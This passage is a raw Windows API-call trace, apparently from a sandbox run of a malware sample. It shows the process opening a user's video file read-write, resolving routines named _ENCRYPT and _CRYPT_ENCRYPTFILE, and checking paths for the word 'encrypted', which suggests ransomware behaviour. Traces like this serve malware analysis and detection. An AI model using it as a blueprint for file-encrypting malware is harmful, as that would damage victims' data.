HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.997] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbe0 [0041.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbe0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.997] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\-23zp4gcog gf3iwx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.998] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.998] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.998] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.998] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.999] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0041.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.999] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.999] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.999] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.999] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.999] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.999] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.999] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x44757480, ftLastWriteTime.dwHighDateTime=0x1d5c4c4, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0x7c20c0 [0042.000] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x44757480, ftLastWriteTime.dwHighDateTime=0x1d5c4c4, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0x7c20c0 [0042.000] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZP4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gcOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cOG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OG gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gf3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3iWX.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.003] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.003] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.003] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, 